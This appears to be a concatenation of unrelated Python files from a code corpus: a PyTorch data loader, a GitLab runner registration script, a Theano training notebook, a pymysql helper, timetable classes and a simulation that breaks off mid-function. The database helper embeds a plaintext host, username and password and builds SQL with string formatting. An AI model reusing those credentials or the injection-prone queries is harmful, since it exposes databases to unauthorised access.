depth = torch.squeeze(torch.tensor(\n h5_file[self.depth][index], dtype=torch.float32))\n colour = torch.tensor(\n h5_file[self.colour][index], dtype=torch.float32)\n grid_size = self.grid_size\n sample = {'depth': depth, 'colour': colour, 'grid_size': grid_size}\n\n # Running out of GPU memory on validation\n sample = data_transform.upper_left_patch(sample)\n\n if self.transform:\n sample = self.transform(sample)\n\n return sample\n\n def __len__(self):\n \"\"\"Return the number of samples in the dataset\"\"\"\n return self.num_samples\n\ndef create_dataloaders(args, config):\n \"\"\"Creates a train and val dataloader from a h5file and a config file\"\"\"\n print(\"Loading dataset\")\n file_path = os.path.join(config['PATH']['hdf5_dir'],\n config['PATH']['hdf5_name'])\n if not Path(file_path).is_file():\n print(file_path, \" is not a valid location\")\n print(\"Please enter a valid location of a h5 file through main.ini\")\n exit(-1)\n train_set = TrainFromHdf5(\n file_path=file_path,\n patch_size=int(config['NETWORK']['patch_size']),\n num_crops=int(config['NETWORK']['num_crops']),\n transform=data_transform.center_normalise)\n val_set = ValFromHdf5(\n file_path=file_path,\n transform=data_transform.center_normalise)\n\n batch_size = {'train': int(config['NETWORK']['batch_size']), 'val': 1}\n data_loaders = {}\n threads = int(config['NETWORK']['num_workers'])\n for name, dset in (('train', train_set), ('val', val_set)):\n data_loaders[name] = DataLoader(\n dataset=dset, num_workers=threads,\n batch_size=batch_size[name],\n shuffle=True)\n\n return data_loaders\n","sub_path":"Direct_3D/PythonCode/data_loading.py","file_name":"data_loading.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"105573140","text":"#!/usr/bin/env python3\n\n###############################################################################\n# Copyright (c) 2019, Lawrence Livermore National Security, LLC\n# Produced at the Lawrence Livermore National Laboratory\n# Written by Thomas Mendoza mendoza33@llnl.gov\n# LLNL-CODE-795365\n# All rights reserved\n#\n# This file is part of gitlab-runner-auth:\n# https://github.com/LLNL/gitlab-runner-auth\n#\n# SPDX-License-Identifier: MIT\n###############################################################################\n\nimport os\nimport re\nimport sys\nimport socket\nimport argparse\nimport json\nimport urllib.request\nfrom string import Formatter\nfrom urllib.request import Request\nfrom urllib.parse import urlencode, urljoin\nfrom urllib.error import HTTPError\nfrom json import JSONDecodeError\n\n\ndef generate_tags(runner_type=\"\"):\n \"\"\"The set of tags for a host\n\n Minimally, this is the system hostname, but should include things like OS,\n architecture, GPU availability, etc.\n\n These tags are specified by runner configs and used by CI specs to run jobs\n on the appropriate host.\n \"\"\"\n\n # the hostname is _required_ to make this script work, everything else\n # is extra (as far as this script is concerned)\n hostname = socket.gethostname()\n\n # also tag with the generic cluster name by removing any trailing numbers\n tags = [hostname, re.sub(r\"\\d\", \"\", hostname)]\n if runner_type == \"batch\":\n\n def which(cmd):\n all_paths = (\n os.path.join(path, cmd) for path in os.environ[\"PATH\"].split(os.pathsep)\n )\n\n return any(\n os.access(path, os.X_OK) and os.path.isfile(path) for path in all_paths\n )\n\n if which(\"bsub\"):\n tags.append(\"lsf\")\n elif 
which(\"salloc\"):\n tags.append(\"slurm\")\n elif which(\"cqsub\"):\n tags.append(\"cobalt\")\n return tags\n\n\ndef list_runners(base_url, access_token, filters=None):\n try:\n query = \"\"\n if filters:\n query = \"?\" + urlencode(filters)\n\n url = urljoin(base_url, \"runners/all\" + query)\n request = Request(url, headers={\"PRIVATE-TOKEN\": access_token})\n return json.load(urllib.request.urlopen(request))\n except JSONDecodeError:\n print(\"Failed parsing request data JSON\")\n sys.exit(1)\n except HTTPError as e:\n print(\"Error listing Gitlab repos: {reason}\".format(reason=e.reason))\n sys.exit(1)\n\n\ndef runner_info(base_url, access_token, repo_id):\n try:\n url = urljoin(base_url, \"runners/\" + str(repo_id))\n request = Request(url, headers={\"PRIVATE-TOKEN\": access_token})\n return json.load(urllib.request.urlopen(request))\n except JSONDecodeError:\n print(\"Failed parsing request data JSON\")\n sys.exit(1)\n except HTTPError as e:\n print(\n \"Error while requesting repo info for repo {repo}: {reason}\".format(\n repo=repo_id, reason=e.reason\n )\n )\n sys.exit(1)\n\n\ndef valid_runner_token(base_url, token):\n \"\"\"Test whether or not a runner token is valid\"\"\"\n\n try:\n url = urljoin(base_url, \"runners/verify\")\n data = urlencode({\"token\": token})\n\n request = Request(url, data=data.encode(), method=\"POST\")\n urllib.request.urlopen(request)\n return True\n except HTTPError as e:\n if e.code == 403:\n return False\n else:\n print(\"Error while validating token: {}\".format(e.reason))\n sys.exit(1)\n\n\ndef register_runner(base_url, admin_token, runner_type, tags):\n \"\"\"Registers a runner and returns its info\"\"\"\n\n try:\n # the first tag is always the hostname\n url = urljoin(base_url, \"runners\")\n data = urlencode(\n {\n \"token\": admin_token,\n \"description\": tags[0] + \"-\" + runner_type,\n \"tag_list\": \",\".join(tags + [runner_type]),\n }\n )\n\n request = Request(url, data=data.encode(), method=\"POST\")\n response = urllib.request.urlopen(request)\n if response.getcode() == 201:\n return json.load(response)\n else:\n print(\"Registration for {runner_type} failed\".format(runner_type))\n sys.exit(1)\n except HTTPError as e:\n print(\n \"Error registering runner {runner} with tags {tags}: {reason}\".format(\n runner=runner_type, tags=\",\".join(tags), reason=e.reason\n )\n )\n sys.exit(1)\n\n\ndef delete_runner(base_url, runner_token):\n \"\"\"Delete an existing runner\"\"\"\n\n try:\n url = urljoin(base_url, \"runners\")\n data = urlencode(\n {\n \"token\": runner_token,\n }\n )\n\n request = Request(url, data=data.encode(), method=\"DELETE\")\n response = urllib.request.urlopen(request)\n if response.getcode() == 204:\n return True\n else:\n print(\"Deleting runner with id failed\")\n sys.exit(1)\n except HTTPError as e:\n print(\"Error deleting runner: {reason}\".format(reason=e.reason))\n sys.exit(1)\n\n\ndef update_runner_config(config_template, config_file, internal_config):\n \"\"\"Using data from config.json, write the config.toml used by the runner\n\n Nominally, this method will provide a dictionary of keyword arguments to\n format of the form:\n\n {\n \"\": \"\",\n ...,\n }\n\n The config.toml must specify named template args like:\n\n [[runners]]\n token = \"{runner_type}\"\n ...\n\n and _not_ use positional arguments.\n \"\"\"\n\n template_kwargs = {\n \"hostname\": socket.gethostname(),\n }\n template_kwargs.update(\n {runner: data[\"token\"] for runner, data in internal_config.items()}\n )\n\n with open(config_template) as th, 
open(config_file, \"w\") as ch:\n template = th.read()\n config = template.format(**template_kwargs)\n ch.write(config)\n\n\ndef configure_runner(prefix, api_url, stateless=False):\n \"\"\"Takes a config template and substitutes runner tokens\"\"\"\n\n runner_config = {}\n config_file = os.path.join(prefix, \"config.toml\")\n config_template = os.path.join(prefix, \"config.template\")\n\n # ensure trailing '/' for urljoin\n if api_url[:-1] != \"/\":\n api_url += \"/\"\n\n with open(os.path.join(prefix, \"admin-token\")) as fh:\n admin_token = fh.read()\n\n if stateless:\n with open(config_template) as fh:\n template = fh.read()\n try:\n with open(os.path.join(prefix, \"access-token\")) as fh:\n access_token = fh.read()\n except FileNotFoundError:\n print(\"A personal access token is required for stateless mode\")\n sys.exit(1)\n filters = {\"scope\": \"shared\", \"tag_list\": \",\".join([socket.gethostname()])}\n runner_types = set(\n token[1]\n for token in Formatter().parse(template)\n if token[1] != \"hostname\" and token[1] is not None\n )\n runners = [\n runner_info(api_url, access_token, r[\"id\"])\n for r in list_runners(api_url, access_token, filters=filters)\n ]\n gitlab_tags = set(tag for r in runners for tag in r[\"tag_list\"])\n if len(runner_types & gitlab_tags) == 0:\n # no config template tags in common with Gitlab, register runners\n # for all the tags pulled from the template.\n for runner_type in iter(runner_types):\n runner_config[runner_type] = register_runner(\n api_url,\n admin_token,\n runner_type,\n generate_tags(runner_type=runner_type),\n )\n else:\n for runner in runners:\n try:\n runner_type = (runner_types & set(runner[\"tag_list\"])).pop()\n runner_config[runner_type] = runner\n except KeyError:\n # we may have picked up a runner which doesn't match our\n # host, skip it\n pass\n else:\n try:\n # ensure tokens are still valid, otherwise, delete the runner and\n # register it again\n data_file = os.path.join(prefix, \"runner-data.json\")\n with open(data_file, \"r\") as fh:\n changed = False\n runner_config = json.load(fh)\n for runner_type, data in runner_config.items():\n data = data or {}\n token = data.get(\"token\", \"\")\n if not token or not valid_runner_token(api_url, token):\n # no refresh endpoint...delete and re-register\n if token:\n delete_runner(api_url, token)\n runner_config[runner_type] = register_runner(\n api_url, admin_token, runner_type, runner_type=runner_type\n )\n changed = True\n if changed:\n with open(data_file, \"w\") as fh:\n fh.write(json.dumps(runner_config, sort_keys=True, indent=4))\n except FileNotFoundError:\n # defaults to creating both a shell and batch runner\n runner_config = {\n t: register_runner(\n api_url, admin_token, t, generate_tags(runner_type=t)\n )\n for t in [\"shell\", \"batch\"]\n }\n with open(data_file, \"w\") as fh:\n fh.write(json.dumps(runner_config, sort_keys=True, indent=4))\n\n update_runner_config(config_template, config_file, runner_config)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"On the fly runner config\")\n parser.add_argument(\n \"-p\",\n \"--prefix\",\n default=\"/etc/gitlab-runner\",\n help=\"\"\"The runner config directory prefix\"\"\",\n )\n parser.add_argument(\n \"--api-url\", default=\"http://localhost:8080/api/v4\", help=\"\"\"Gitlab API URL\"\"\"\n )\n parser.add_argument(\n \"--stateless\",\n action=\"store_true\",\n help=\"\"\"If used, disables writing runner-data.json and must query\n Gitlab directly for state.\n \"\"\",\n )\n args = 
parser.parse_args()\n configure_runner(args.prefix, args.api_url, stateless=args.stateless)\n","sub_path":"gitlab_runner_config.py","file_name":"gitlab_runner_config.py","file_ext":"py","file_size_in_byte":10440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"397463848","text":"#%%\nimport os\nimport numpy as np\nimport pandas as pd\nimport timeit\nimport pickle\nimport theano\nimport theano.tensor as T\nimport optimizers\nimport matplotlib.pyplot as plt\n\nfrom theano import shared, function\nfrom scipy import stats\nfrom models import Logit, ResNet\nfrom core import shared_dataset\n\nFLOATX = theano.config.floatX\n\nbatch_size = 20\nlearning_rate = 1e-3\nlayers = 1\nn_epochs = 1000\n\ndata = pd.read_csv('data-20190617.csv')\n# data['trip_length_km'] = stats.boxcox(data['trip_length_km']+1e-7, 0.191)\n# data['trip_duration_min'] = stats.boxcox(data['trip_duration_min']+1e-7, 0.20529)\nx_var = data.loc[:, 'weekend':'Non disponible']\ny_var = data.loc[:, 'activity_choice']\n\nn = data.shape[0]\nm = x_var.shape[1]\nslice = np.floor(0.7*n).astype(int)\n\ntrain_x_var, valid_x_var = x_var.iloc[:slice], x_var.iloc[slice:]\ntrain_y_var, valid_y_var = y_var.iloc[:slice], y_var.iloc[slice:]\n\ntrain_x_shared, train_y_shared = shared_dataset(train_x_var, train_y_var)\nvalid_x_shared, valid_y_shared = shared_dataset(valid_x_var, valid_y_var)\n\nn_train_batches = train_y_var.shape[0] // batch_size\nn_valid_batches = valid_y_var.shape[0] // batch_size\n\nindex = T.lscalar() # index to [mini]batch\n\nx = T.matrix('x')\ny = T.ivector('y')\n\n# model = Logit(input=x, choice=y, n_vars=m, n_choices=10)\n# cost = model.negative_log_likelihood(y)\n# opt = optimizers.RMSProp(model.params)\n# updates = opt.run_update(cost, model.params)\n\nmodel = ResNet(input=x, choice=y, n_vars=m, n_choices=10, n_layers=8)\ncost = model.negative_log_likelihood(y)\nopt = optimizers.RMSProp(model.resnet_params)\nupdates = opt.run_update(cost, model.resnet_params)\n\ntrain_model = function(\n inputs=[index],\n outputs=cost,\n updates=updates,\n allow_input_downcast=True,\n givens={\n x: train_x_shared[index * batch_size: (index + 1) * batch_size],\n y: train_y_shared[index * batch_size: (index + 1) * batch_size],\n },\n)\n\nvalidate_model = function(\n inputs=[],\n outputs=cost,\n allow_input_downcast=True,\n givens={\n x: valid_x_shared,\n y: valid_y_shared,\n },\n)\n\npredict_model = function(\n inputs=[index],\n outputs=model.errors(y),\n allow_input_downcast=True,\n givens={\n x: valid_x_shared[index * batch_size: (index + 1) * batch_size],\n y: valid_y_shared[index * batch_size: (index + 1) * batch_size],\n },\n)\n\nhessians = function(\n inputs=[index],\n outputs=model.get_gessians(y),\n allow_input_downcast=True,\n givens={\n x: train_x_shared[index * batch_size: (index + 1) * batch_size],\n y: train_y_shared[index * batch_size: (index + 1) * batch_size],\n },\n)\n\npatience = 5000 # look as this many examples regardless\npatience_increase = 2\nimprovement_threshold = 0.9999\nvalidation_frequency = n_train_batches\n\nbest_validation_likelihood = np.inf\nstart_time = timeit.default_timer()\n\ndone_looping = False\nepoch = 0\n\nwhile (epoch < n_epochs) and (not done_looping):\n epoch = epoch + 1\n for minibatch_index in range(n_train_batches):\n # n = np.random.randint(0, n_train_batches)\n minibatch_avg_cost = train_model(minibatch_index)\n iter = (epoch - 1) * n_train_batches + minibatch_index\n\n if (iter + 1) % validation_frequency == 0:\n validation_likelihood = 
validate_model()\n likelihood = np.sum(validation_likelihood)\n\n print(('epoch {:d}, minibatch {:d}/{:d}, '\n 'validation likelihood {:.2f}').format(\n epoch,\n minibatch_index + 1,\n n_train_batches,\n likelihood,\n )\n )\n\n if likelihood < best_validation_likelihood:\n # improve patience if loss improvement is good enough\n if likelihood < best_validation_likelihood * improvement_threshold:\n patience = max(patience, iter * patience_increase)\n\n best_validation_likelihood = likelihood\n\n validation_predict = [predict_model(i)\n for i in range(n_valid_batches)]\n error = np.mean(validation_predict)\n print((' '\n 'validation error {:.2%}').format(error))\n\n # save the best model\n with open('best_model.pkl', 'wb') as f:\n pickle.dump(model, f)\n\n if (patience <= iter) and (epoch > 10):\n done_looping = True\n break\n\nend_time = timeit.default_timer()\nprint(('Optimization complete with best validation likelihood of {:.2f}, '\n 'and validation error of {:.2%}').format(best_validation_likelihood, error))\nprint(('The code ran for {:d} epochs, with {:.2f} epochs/sec').format(\n epoch,\n 1. * epoch / (end_time - start_time),\n )\n)\n\nprint('statistics...')\nmodel_hessians = np.mean([hessians(i) for i in range(n_train_batches)], axis=0)\nmodel_stderr = [np.sqrt(1/h) for h in model_hessians]\nmodel_tstat = [b.get_value()/s for b, s in zip(model.params, model_stderr)]\n# print('hessians', pd.DataFrame(model_hessians[0]))\n\n#%%\nprint('statistics...')\nnp.set_printoptions(precision=4, suppress=True)\nmodel_hessians = np.sum([hessians(i) for i in range(n_train_batches)], axis=0)\nmodel_stderr = [np.sqrt(1/h) for h in model_hessians]\nmodel_tstat = [b.get_value()/s for b, s in zip(model.params, model_stderr)]\n\n#%%\ndf = pd.DataFrame(model.params[0].eval())\ndf.to_csv('beta_init.csv', index=False, header=False)\nprint(df.shape)\ndf = pd.DataFrame(model.params[1].eval())\ndf.to_csv('beta_0_init.csv', index=False, header=False)\nprint(df.shape)\n\n#%%\ndef hinton(matrix, tstat=None, max_weight=None, ax=None):\n \"\"\"Draw Hinton diagram for visualizing a weight matrix.\"\"\"\n ax = ax if ax is not None else plt.gca()\n\n if not max_weight:\n max_weight = 2 ** np.ceil(np.log(np.abs(matrix).max(axis=1)) / np.log(2))\n matrix = (matrix - np.mean(matrix, axis=1, keepdims=True))/ np.std(matrix, axis=1, keepdims=True)\n\n ax.patch.set_facecolor('gray')\n ax.set_aspect('equal', 'box')\n ax.xaxis.set_major_locator(plt.NullLocator())\n ax.yaxis.set_major_locator(plt.NullLocator())\n\n for (x, y), w in np.ndenumerate(matrix):\n\n size = np.sqrt(np.abs(w)/max_weight[y])\n color = 'white' if w > 0 else 'black'\n\n if tstat is not None:\n if tstat[x, y] >= 1:\n edge = 'red'\n else:\n edge = color\n else:\n edge = color\n\n rect = plt.Rectangle([x - size / 2, y - size / 2], size, size,\n facecolor=color, edgecolor=edge)\n ax.add_patch(rect)\n\n ax.autoscale_view()\n ax.invert_yaxis()\n\n\n#%%\ntstat = np.abs(model_tstat[0])\np = model.params[0].get_value()\nhinton(p, tstat=(tstat <= 1.96))\n\n\n#%%\n
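# Added minimal sketch (not from the original notebook) of the patience-based\n# early stopping used in the training loop above: the iteration budget only\n# grows while the validation score keeps improving by a meaningful margin\ndef patience_budget(scores, patience=5000, increase=2, threshold=0.9999):\n    best = float('inf')\n    for step, score in enumerate(scores):\n        if score < best * threshold: # meaningful improvement\n            patience = max(patience, step * increase) # extend the budget\n        best = min(best, score)\n        if patience <= step: # out of patience, stop early\n            return step\n    return len(scores)\n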
","sub_path":"notebook.py","file_name":"notebook.py","file_ext":"py","file_size_in_byte":6828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"12093394","text":"\"\"\"\n=================================\nAuthor: Flora Chen\nTime: 2021/1/20 20:33\n-_- -_- -_- -_- -_- -_- -_- -_-\n=================================\n\"\"\"\nimport pymysql\n\n\nclass DBHandler:\n \"\"\"\n Database operations\n \"\"\"\n\n def __init__(self,\n host=None,\n port=None,\n user=None,\n password=None,\n database=None,\n charset=\"utf8\",\n cursorclass=pymysql.cursors.DictCursor # with this cursor class, rows come back as dicts\n ):\n \"\"\"\n Connect to the database in the initializer\n \"\"\"\n\n # establish the connection\n self.conn = pymysql.connect(host=host,\n port=port,\n user=user,\n password=password,\n database=database,\n charset=charset,\n cursorclass=cursorclass\n )\n\n def query_all(self, sql):\n \"\"\"\n Query all rows matching the sql\n :param sql: the sql to execute\n :return: the query result\n \"\"\"\n # create a cursor object\n self.cursor = self.conn.cursor()\n self.conn.commit()\n self.cursor.execute(sql)\n data = self.cursor.fetchall()\n self.cursor.close()\n return data\n\n def query_one(self, sql):\n \"\"\"\n Query the first row matching the sql\n :param sql: the sql to execute\n :return: the first row of the query result\n \"\"\"\n # create a cursor object\n self.cursor = self.conn.cursor()\n\n self.conn.commit()\n self.cursor.execute(sql)\n data = self.cursor.fetchone()\n self.cursor.close()\n return data\n\n def insert(self, sql):\n \"\"\"\n Insert data\n :param sql: the sql to execute\n \"\"\"\n # create a cursor object\n self.cursor = self.conn.cursor()\n\n self.cursor.execute(sql)\n # commit - any database update must be committed\n self.conn.commit()\n\n self.cursor.close()\n\n def update(self, sql):\n \"\"\"\n Update data\n :param sql: the sql to execute\n \"\"\"\n # create a cursor object\n self.cursor = self.conn.cursor()\n\n self.cursor.execute(sql)\n # commit - any database update must be committed\n self.conn.commit()\n\n self.cursor.close()\n\n def query(self, sql, one=True):\n \"\"\"\n Query one row or all rows, depending on the argument\n :param one: defaults to True. True queries one row, otherwise all rows\n :return:\n \"\"\"\n if one:\n return self.query_one(sql)\n else:\n return self.query_all(sql)\n\n def close(self):\n \"\"\"\n Close the cursor and the database connection\n :return:\n \"\"\"\n self.conn.close()\n\n\nif __name__ == \"__main__\":\n db = DBHandler()\n # data = db.query_all(\"SELECT mobile_phone from member limit 1;\")\n # print(data[0][\"mobile_phone\"])\n # print(type(data))\n member_id = db.query_one(\"select id from member where mobile_phone=13504936561;\")[\"id\"]\n print(member_id, type(member_id))\n leave_amount = db.query_one(\"select leave_amount from member where mobile_phone=13504936561;\")[\"leave_amount\"]\n print(leave_amount)\n add_mount = db.update(\"update member set leave_amount={} where id={};\".format(500, member_id))\n\n leave_amount_after = db.query_one(\"select leave_amount from member where mobile_phone=13504936561;\")[\"leave_amount\"]\n print(leave_amount_after)\n db.close()\n\n\"\"\"\n1. Establish the connection\n2. Get a cursor\n3. Execute the sql statement through the cursor\n4. Fetch the results through the cursor\n\"\"\"\n
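\n# Added note (not part of the original module): interpolating values with\n# str.format, as the demo above does, is open to SQL injection. pymysql can\n# bind parameters itself through %s placeholders:\ndef query_one_safe(db, sql, params):\n    cursor = db.conn.cursor()\n    cursor.execute(sql, params) # the driver escapes each bound value\n    row = cursor.fetchone()\n    cursor.close()\n    return row\n\n# query_one_safe(db, \"select id from member where mobile_phone=%s;\", (13504936561,))\n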
\"\"\"\n# Establish the connection\nconn = pymysql.connect(host=\"8.129.91.152\",\n port=3306,\n user=\"future\",\n password=\"123456\",\n # Note: do not write it as utf-8\n charset=\"utf8\",\n database=\"futureloan\" # once the database name is given here, later SQL statements do not need to carry it\n )\n# Get a cursor\ncursor = conn.cursor()\n\n# Execute the sql statement through the cursor\n# cursor.execute(\"SELECT * FROM futureloan.member LIMIT 10;\")\ncursor.execute(\"SELECT * FROM member LIMIT 10;\")\ncursor.execute(\"SELECT * FROM member WHERE id={};\".format(1))\n\n# Fetch the results through the cursor - query all\n# data = cursor.fetchall()\n\n# Fetch the results through the cursor - query one row\ndata = cursor.fetchone()\nprint(data)\n\n# Close the cursor and the database connection\ncursor.close()\nconn.close()\n\n\"\"\"\n
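\n# Added variant (illustrative only): pymysql cursors also support the\n# with-statement, which closes them even if a query raises\ndef fetch_first_member(conn):\n    with conn.cursor() as cursor: # cursor is closed automatically\n        cursor.execute(\"SELECT * FROM member LIMIT 1;\")\n        return cursor.fetchone()\n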
","sub_path":"common/db_handler.py","file_name":"db_handler.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"445336846","text":"class Lesson:\n \"\"\"\n This class represents each Lesson. I made it just so it would be easier to code than using dictionaries\n \"\"\"\n def __init__(self, lesson: str, lesson_number: str, lesson_time: str, teacher: str, classroom: str):\n \"\"\"\n Parameters\n ------------\n lesson -> Represents the lesson subject\n\n lesson_number -> Represents the lesson number\n\n lesson_time -> Represents the lesson time\n\n teacher -> Represents the teacher\n\n classroom -> Represents the classroom in which the lesson will be\n ------------\n\n All parameters can be None\n \"\"\"\n self.lesson = lesson\n self.number = lesson_number\n self.time = lesson_time\n self.teacher = teacher\n self.classroom = classroom\n\n def to_dict(self):\n return {\n \"lesson\": self.lesson,\n \"number\": self.number,\n \"time\": self.time,\n \"teacher\": self.teacher,\n \"classroom\": self.classroom\n }\n\n def __str__(self):\n return f\"Lesson: {self.lesson}.\\tLesson number: {self.number}.\\tTime: {self.time}.\\tTeacher: {self.teacher}.\\tClassroom: {self.classroom}\"\n \n\nclass Day:\n \"\"\"\n This class represents a Day in the week. It was easier for me to use a class instead of a dictionary\n \"\"\"\n def __init__(self, day: int, items: list):\n \"\"\"\n Parameters\n ------------\n day -> Represents the day number\n\n items -> Represents the lessons in the day\n ------------\n \"\"\"\n days = {\n \"0\": \"Sunday\",\n \"1\": \"Monday\",\n \"2\": \"Tuesday\",\n \"3\": \"Wednesday\",\n \"4\": \"Thursday\",\n \"5\": \"Friday\",\n }\n while day > 5:\n day -= 5\n while day < 0:\n day += 5\n self.day = days[f\"{day}\"]\n self.lessons = items\n \n def __str__(self):\n lessons = \"\"\n for i in self.lessons:\n lessons += f\"{i}\\n\"\n lessons = lessons[:-1]\n return f\"Day: {self.day}.\\n\\n\\nLessons: {lessons}\"\n\n\ndef find_lesson(iscool_lessons: list, teacher_name: str):\n \"\"\"\n Parameters\n ------------\n iscool_lessons -> Represents the iscool lessons\n\n teacher_name -> Represents the teacher name\n ------------\n \"\"\"\n for i in range(len(iscool_lessons)):\n if iscool_lessons[i].teacher == teacher_name:\n return iscool_lessons[i]\n\n\ndef compare(iscool_lessons: list, mashov_lessons: list, times: list):\n \"\"\"\n Parameters\n ------------\n iscool_lessons -> Represents the iscool lessons\n\n mashov_lessons -> Represents the mashov lessons\n\n times -> Represents the list of `times` in the timetable\n ------------\n \"\"\"\n classes = []\n for i in range(len(mashov_lessons)):\n if mashov_lessons[0].number == 1:\n lesson = find_lesson(iscool_lessons[i + 1], mashov_lessons[i].teacher)\n else:\n lesson = find_lesson(iscool_lessons[i], mashov_lessons[i].teacher)\n if isinstance(lesson, Lesson):\n classes.append(lesson)\n else:\n mashov_lessons[i].time = times[len(classes) + 1].contents[0].contents[2].text\n classes.append(mashov_lessons[i])\n return classes\n","sub_path":"extras.py","file_name":"extras.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"586854400","text":"import simpy\nimport functools\nimport random as np\nimport time\nfrom enum import Enum\nimport numpy\nfrom scipy.stats import norm\nimport matplotlib.pyplot as plt\nimport batch_teste as lp\nimport pureBatchILP as plp\nimport copy\n\ncount = 0\n#timestamp to change the load\nchange_time = 3600\n#the next time\nnext_time = 3600\n#the actual hour time stamp\nactual_stamp = 0.0\n#inter-arrival rate of the users' requests\narrival_rate = 3600\n#service time of a request\nservice_time = lambda x: np.uniform(0,100)\n#total generated requests per timestamp\ntotal_period_requests = 0\n#to generate the traffic load of each timestamp\nloads = []\nactives = []\n#number of timestamps of load changing\nstamps = 24\nhours_range = range(1, stamps+1)\nfor i in range(stamps):\n\tx = norm.pdf(i, 12, 4)\n\tx *= 100\n\t#x= round(x,4)\n\t#if x != 0:\n\t#\tloads.append(x)\n\tloads.append(x)\n#distribution for arrival of packets\n#first arrival rate of the simulation - to initiate the simulation\narrival_rate = loads[0]/change_time\ndistribution = lambda x: np.expovariate(arrival_rate)\nloads.reverse()\n#print(loads)\nstamps = len(loads)\n#record the requests arrived at each stamp\ntraffics = []\n#amount of rrhs\nrrhs_amount = 100\n#list of rrhs of the network\nrrhs = []\n#amount of processing nodes\nnodes_amount = 10\n#list of processing nodes\nnodes = []\nrrh_nodes = range(0,10)\n#capacity of each rrh\nrrh_capacity = 5000\n#keeps the non allocated requests\nno_allocated = []\ntotal_aloc = 0\ntotal_nonaloc = 0\nlambdas = range(0,10)\nswitchBandwidth = 
[10000.0,10000.0,10000.0,10000.0,10000.0,10000.0,10000.0,10000.0,10000.0,10000.0]\nwavelength_capacity = [10000.0, 10000.0,10000.0,10000.0,10000.0,10000.0,10000.0,10000.0,10000.0,10000.0]\nlc_cost = 20\nB = 1000000\nop = 0\nmaximum_load = 100\n#to keep the consumption of each allocated RRH\npower_consumption = []\n#average power consumption of each hour of the day\naverage_power_consumption = []\n#to keep the power consumption of the batch allocation\nbatch_power_consumption = []\n#to keep the average consumption of each hour of the day for the batch case\nbatch_average_consumption = []\n#counting the blocked RRHs\nincremental_blocking = 0\nbatch_blocking = 0\ntotal_inc_blocking = []\ntotal_batch_blocking = []\n#to count the redirected rrhs\nredirected = []\n#to count the activated nodes\nactivated_nodes = []\naverage_act_nodes = []\nb_activated_nodes = []\nb_average_act_nodes = []\n#to count the activated lambdas\nactivated_lambdas = []\naverage_act_lambdas = []\nb_activated_lambdas = []\nb_average_act_lambdas = []\n#to count the activated DUs\nactivated_dus = []\naverage_act_dus = []\nb_activated_dus = []\nb_average_act_dus = []\n#to count the activated switches\nactivated_switchs = []\naverage_act_switch = []\nb_activated_switchs = []\nb_average_act_switch = []\n#to count the redirected RRHs\nredirected_rrhs = []\naverage_redir_rrhs = []\nb_redirected_rrhs = []\nb_average_redir_rrhs = []\n#count the amount of time the solution took\ntime_inc = []\navg_time_inc = []\ntime_b = []\navg_time_b = []\n#count the occurrences of cloud and fog nodes\ncount_cloud = []\ncount_fog = []\nb_count_cloud = []\nb_count_fog = []\nmax_count_cloud = []\naverage_count_fog = []\nb_max_count_cloud = []\nb_average_count_fog = []\n\nnodeCost = [\n600.0,\n500.0,\n500.0,\n500.0,\n500.0,\n500.0,\n500.0,\n500.0,\n500.0,\n500.0,\n]\nlambda_cost = [\n20.0,\n20.0,\n20.0,\n20.0,\n20.0,\n20.0,\n20.0,\n20.0,\n20.0,\n20.0,\n]\n#rrhs = util.createRRHs(100, env, cp, service_time)\nbatch_count = 0\n#traffic generator - generates requests considering the distribution\nclass Traffic_Generator(object):\n\tdef __init__(self, env, distribution, service, cp):\n\t\tself.env = env\n\t\tself.dist = distribution\n\t\tself.service = service\n\t\tself.cp = cp\n\t\tself.req_count = 0\n\t\tself.action = self.env.process(self.run())\n\t\tself.load_variation = self.env.process(self.change_load())\n\n\t#generation of requests\n\tdef run(self):\n\t\tglobal total_period_requests\n\t\tglobal rrhs\n\t\t#global actives\n\t\twhile True:\n\t\t\t#print(\"Entering here!!!!\")\n\t\t\t#if total_period_requests <= maximum_load:\n\t\t\tyield self.env.timeout(self.dist(self))\n\t\t\tself.req_count += 1\n\t\t\t#takes the first turned-off RRH\n\t\t\tif rrhs:\n\t\t\t\tr = rrhs.pop()\n\t\t\t\t#print(\"Took {} RRHS list is {}\".format(r.id, len(rrhs)))\n\t\t\t\tself.cp.requests.put(r)\n\t\t\t\tr.enabled = True\n\t\t\t\ttotal_period_requests +=1\n\t\t\t\t#np.shuffle(rrhs)\n\t\t\telse:\n\t\t\t\tpass\n\t\t\t\t#print(\"All RRHs are active!\")\n\t\t\t#else:\n\t\t\t#\tprint(\"No RRHs!\")\n\t\t\t#yield self.env.timeout(0.05)\n\n\t#changing of load\n\tdef change_load(self):\n\t\twhile True:\n\t\t\tglobal traffics\n\t\t\t#global loads\n\t\t\tglobal arrival_rate\n\t\t\tglobal total_period_requests\n\t\t\tglobal next_time\n\t\t\tglobal power_consumption\n\t\t\tglobal batch_power_consumption\n\t\t\tglobal incremental_blocking\n\t\t\tglobal batch_blocking\n\t\t\tglobal activated_nodes\n\t\t\tglobal activated_dus\n\t\t\tglobal activated_lambdas\n\t\t\tglobal 
